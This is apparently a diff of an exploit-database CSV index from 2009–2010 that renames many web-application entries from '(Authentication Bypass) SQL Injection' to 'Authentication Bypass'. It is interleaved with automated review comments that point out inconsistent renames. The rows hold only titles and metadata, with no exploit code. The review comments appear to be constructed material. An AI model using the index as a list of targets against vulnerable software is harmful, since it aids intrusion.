9334,platforms/php/webapps/9334.txt,"QuickDev 4 - 'download.php' File Disclosure",2009-08-03,SirGod,php,webapps,0
|
||||
9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
|
||||
9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
|
||||
9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0
|
||||
9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0
|
||||
9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0
|
||||
9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
|
||||
9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
|
||||
9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
|
||||
9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0
|
||||
9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - Authentication Bypass",2009-08-03,snakespc,php,webapps,0
|
||||
9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0
|
||||
9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0
|
||||
9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
|
||||
9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
|
||||
9348,platforms/php/webapps/9348.txt,"Blink Blog System - Authentication Bypass",2009-08-03,"Salvatore Fresta",php,webapps,0
|
||||
9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
|
||||
9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0
|
||||
9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0
|
||||
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0
|
||||
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - Authentication Bypass",2009-08-04,SirGod,php,webapps,0
|
||||
9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0
|
||||
9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
|
||||
9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0
|
||||
|
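Review bot: After this hunk three title styles for the same kind of issue sit side by side: the renamed entries (9328, 9332, 9335, 9336, 9341, 9348, 9353) use a bare "Authentication Bypass", 9327 keeps "Authentication Bypass / SQL Injection", and 9326 and 9337 still carry parenthesised qualifiers ("(Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities", "(files.php) Authentication Bypass"). Anyone filtering the CSV by title has to know all three. Either extend the change to 9326 and 9337 or adopt the 9327 form for the renamed rows.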
@ -21453,18 +21456,18 @@ id,file,description,date,author,platform,type,port
|
|||
9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
|
||||
9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0
|
||||
9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0
|
||||
9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
|
||||
9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,php,webapps,0
|
||||
9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0
|
||||
9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0
|
||||
9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
|
||||
9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection",2009-08-07,"Jafer Al Zidjali",php,webapps,0
|
||||
9395,platforms/php/webapps/9395.txt,"PHPCityPortal - (Authentication Bypass) SQL Injection",2009-08-07,CoBRa_21,php,webapps,0
|
||||
9395,platforms/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps,0
|
||||
9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0
|
||||
9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0
|
||||
9398,platforms/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0
|
||||
9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0
|
||||
9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - Authentication Bypass",2009-08-07,Dns-Team,php,webapps,0
|
||||
9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0
|
||||
9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0
|
||||
9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - Authentication Bypass",2009-08-10,Mr.tro0oqy,php,webapps,0
|
||||
9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0
|
||||
9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,php,webapps,0
|
||||
9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0
|
||||
|
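Review bot: 9394, "Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection", is left unchanged while 9385, 9395, 9399 and 9404 in the same hunk are renamed. It looks as if the replacement pattern matched only the exact string "(Authentication Bypass) SQL Injection" and skipped the "Blind" variant. Please confirm whether that was intended and, if not, widen the pattern.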
@ -21512,7 +21515,7 @@ id,file,description,date,author,platform,type,port
|
|||
9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",php,webapps,0
|
||||
9491,platforms/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0
|
||||
9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0
|
||||
9494,platforms/php/webapps/9494.txt,"humanCMS - (Authentication Bypass) SQL Injection",2009-08-24,next,php,webapps,0
|
||||
9494,platforms/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,php,webapps,0
|
||||
9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Parameter Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0
|
||||
9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0
|
||||
9502,platforms/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0
|
||||
|
@ -21589,12 +21592,12 @@ id,file,description,date,author,platform,type,port
|
|||
9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0
|
||||
9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
|
||||
9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0
|
||||
9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection",2009-09-15,snakespc,php,webapps,0
|
||||
9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,php,webapps,0
|
||||
9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0
|
||||
9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps,0
|
||||
9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0
|
||||
9693,platforms/php/webapps/9693.txt,"Joomla! Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps,0
|
||||
9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Authentication Bypass) SQL Injection",2009-09-16,snakespc,php,webapps,0
|
||||
9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - Authentication Bypass",2009-09-16,snakespc,php,webapps,0
|
||||
9697,platforms/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
|
||||
9698,platforms/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
|
||||
9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",php,webapps,0
|
||||
|
@ -21605,7 +21608,7 @@ id,file,description,date,author,platform,type,port
|
|||
9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0
|
||||
9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
|
||||
9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0
|
||||
9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
|
||||
9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",php,webapps,0
|
||||
9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0
|
||||
9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0
|
||||
9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0
|
||||
|
@ -21755,7 +21758,7 @@ id,file,description,date,author,platform,type,port
|
|||
10218,platforms/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
|
||||
10219,platforms/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
|
||||
10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
|
||||
10222,platforms/php/webapps/10222.txt,"W3infotech - (Authentication Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0
|
||||
10222,platforms/php/webapps/10222.txt,"W3infotech - Authentication Bypass",2009-11-24,ViRuS_HiMa,php,webapps,0
|
||||
10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0
|
||||
10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000
|
||||
10227,platforms/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0
|
||||
|
@ -21824,13 +21827,13 @@ id,file,description,date,author,platform,type,port
|
|||
10356,platforms/php/webapps/10356.txt,"Joomla! Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0
|
||||
10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
|
||||
10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
|
||||
10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Authentication Bypass) SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0
|
||||
10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - Authentication Bypass",2009-12-09,"AnTi SeCuRe",php,webapps,0
|
||||
10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0
|
||||
10366,platforms/php/webapps/10366.txt,"Joomla! Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
|
||||
10367,platforms/php/webapps/10367.txt,"Joomla! Component com_jphoto - 'id' SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
|
||||
10368,platforms/asp/webapps/10368.txt,"Free ASP Upload - Arbitrary File Upload",2009-12-10,Mr.aFiR,asp,webapps,0
|
||||
10369,platforms/php/webapps/10369.txt,"Joomla! Component Mamboleto 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",php,webapps,0
|
||||
10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection)",2009-12-10,mr_me,php,webapps,0
|
||||
10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Authentication Bypass",2009-12-10,mr_me,php,webapps,0
|
||||
10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0
|
||||
10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80
|
||||
10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0
|
||||
|
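Review bot: The rename of 10370 removes more than the parenthetical: "PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection)" becomes "PHP Inventory 1.2 - Authentication Bypass", losing both the "Remote" qualifier and the injection class. The old title was already in "issue (cause)" form without a leading parenthesis, so it is not clear what formatting problem this row fixes. Consider leaving it as it was, or document why "Remote" is dropped here.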
@ -21895,9 +21898,9 @@ id,file,description,date,author,platform,type,port
|
|||
10462,platforms/php/webapps/10462.txt,"DubSite CMS 1.0 - Cross-Site Request Forgery",2009-12-15,Connection,php,webapps,0
|
||||
10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - Cross-Site Request Forgery",2009-12-15,Nex,php,webapps,0
|
||||
10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0
|
||||
10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Authentication Bypass) SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0
|
||||
10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0
|
||||
10467,platforms/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0
|
||||
10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection",2009-12-16,Red-D3v1L,asp,webapps,0
|
||||
10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 - Authentication Bypass",2009-12-16,Red-D3v1L,asp,webapps,0
|
||||
10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
10473,platforms/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10474,platforms/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
|
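Review bot: The change to 10470 bundles a version fix with the title rename: "JM CMS 1.0 <= 1.0" becomes "JM CMS 1.0". The version cleanup is reasonable, since a range from 1.0 to 1.0 says nothing, but it is a separate kind of edit from the other rows in this commit and is easy to miss in review. Mention it in the commit message, or split it out, so the affected-version change is traceable.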
@ -21910,17 +21913,17 @@ id,file,description,date,author,platform,type,port
|
|||
10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,ViRuSMaN,asp,webapps,0
|
||||
10485,platforms/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps,0
|
||||
10488,platforms/php/webapps/10488.txt,"WordPress Plugin WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0
|
||||
10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',php,webapps,0
|
||||
10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0
|
||||
10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
|
||||
|
@ -21962,7 +21965,7 @@ id,file,description,date,author,platform,type,port
|
|||
10562,platforms/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0
|
||||
10564,platforms/php/webapps/10564.txt,"Saurus CMS 4.6.4 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0
|
||||
10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0
|
||||
10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0
|
||||
10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - Authentication Bypass",2009-12-20,PaL-D3v1L,php,webapps,0
|
||||
10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Arbitrary File Upload",2009-12-20,"Master Mind",php,webapps,0
|
||||
10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion",2009-12-20,cOndemned,php,webapps,0
|
||||
10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps,0
|
||||
|
@ -22147,8 +22150,8 @@ id,file,description,date,author,platform,type,port
|
|||
10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0
|
||||
10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - 'bnnr.php' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10830,platforms/php/webapps/10830.txt,"Azadi Network - (page) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0
|
||||
10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0
|
||||
10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0
|
||||
10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
|
@ -22163,7 +22166,7 @@ id,file,description,date,author,platform,type,port
|
|||
10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps,0
|
||||
10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0
|
||||
10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0
|
||||
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - Authentication Bypass",2009-12-31,"Hussin X",php,webapps,0
|
||||
10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
|
@ -22179,10 +22182,10 @@ id,file,description,date,author,platform,type,port
|
|||
10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0
|
||||
10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0
|
||||
10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection",2010-01-01,Gamoscu,php,webapps,0
|
||||
10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass (SQL Injection)",2010-01-01,R3d-D3V!L,php,webapps,0
|
||||
10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass",2010-01-01,R3d-D3V!L,php,webapps,0
|
||||
10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0
|
||||
10905,platforms/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0
|
||||
10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass (SQL Injection)",2010-01-02,R3d-D3V!L,php,webapps,0
|
||||
10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass",2010-01-02,R3d-D3V!L,php,webapps,0
|
||||
10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0
|
||||
10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Cookie Handling",2010-01-02,DigitALL,php,webapps,0
|
||||
10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0
|
||||
|
@ -22373,7 +22376,7 @@ id,file,description,date,author,platform,type,port
|
|||
11319,platforms/php/webapps/11319.txt,"MYRE Classified - (cat) SQL Injection",2010-02-02,kaMtiEz,php,webapps,0
|
||||
11321,platforms/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)",2010-02-03,"Milos Zivanovic",php,webapps,0
|
||||
11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - (Authentication Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0
|
||||
11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0
|
||||
11324,platforms/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps,0
|
||||
11325,platforms/php/webapps/11325.txt,"RealAdmin - 'detail.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
11326,platforms/php/webapps/11326.txt,"cityadmin - 'links.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
|
@ -22387,16 +22390,16 @@ id,file,description,date,author,platform,type,port
|
|||
11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0
|
||||
11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,cp77fk4r,php,webapps,0
|
||||
11344,platforms/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,HackXBack,php,webapps,0
|
||||
11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
|
||||
